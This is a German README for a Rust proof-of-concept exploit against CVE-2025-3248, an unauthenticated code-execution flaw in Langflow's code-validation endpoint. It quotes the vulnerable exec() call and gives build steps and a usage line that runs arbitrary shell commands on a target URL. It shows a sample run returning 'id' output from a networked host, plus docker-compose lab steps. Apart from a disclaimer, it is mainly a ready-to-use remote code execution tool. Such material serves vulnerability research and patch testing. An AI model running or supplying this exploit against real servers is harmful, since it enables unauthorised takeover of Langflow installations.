
⚠️ Haftungsausschluss
Dieser Code ist ausschließlich für Bildungs- und Forschungszwecke bestimmt. Die unbefugte Verwendung auf Systemen ohne ausdrückliche Genehmigung kann einen Verstoß gegen das Gesetz darstellen.
Der Autor ist nicht verantwortlich für Missbrauch oder böswillige Aktivitäten im Zusammenhang mit diesem Tool.
CVE-2025-3248 - Kritisch
CVSS-Score: 9.8 | EPSS-Score: 92.57% | Veröffentlicht: 22. Mai 2025
Der Endpunkt /api/v1/validate/code akzeptiert unbereinigten Python-Code und führt ihn direkt mit exec() aus, ohne dass eine Authentifizierung erforderlich ist.
# langflow/api/builder/execute.py
exec(code) # No input validation or sandboxing!
Langflow stellt einen /api/v1/builder/execute_code-Endpunkt bereit, der vom Benutzer bereitgestellten Python-Code entgegennimmt und ihn direkt an exec() im Backend übergibt. Da keine Authentifizierung oder Sandboxing vorhanden ist, können Angreifer beliebige Payloads zur Codeausführung erstellen.
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC
cargo build --release
# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860,
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)
> cd lab
> sudo docker-compose up -d
> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'
> sudo docker-compose down